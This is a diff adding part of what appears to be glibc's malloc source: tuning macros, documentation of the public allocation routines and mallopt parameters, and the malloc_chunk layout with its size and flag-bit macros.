+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Same, except also perform an argument and result check.  First, we check
+   that the padding done by request2size didn't result in an integer
+   overflow.  Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
+   size isn't so large that a later alignment would lead to another integer
+   overflow.  */
+#define checked_request2size(req, sz) \
+({				    \
+  (sz) = request2size (req);	    \
+  if (((sz) < (req))		    \
+      || REQUEST_OUT_OF_RANGE (sz)) \
+    {				    \
+      __set_errno (ENOMEM);	    \
+      return 0;			    \
+    }				    \
+})
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
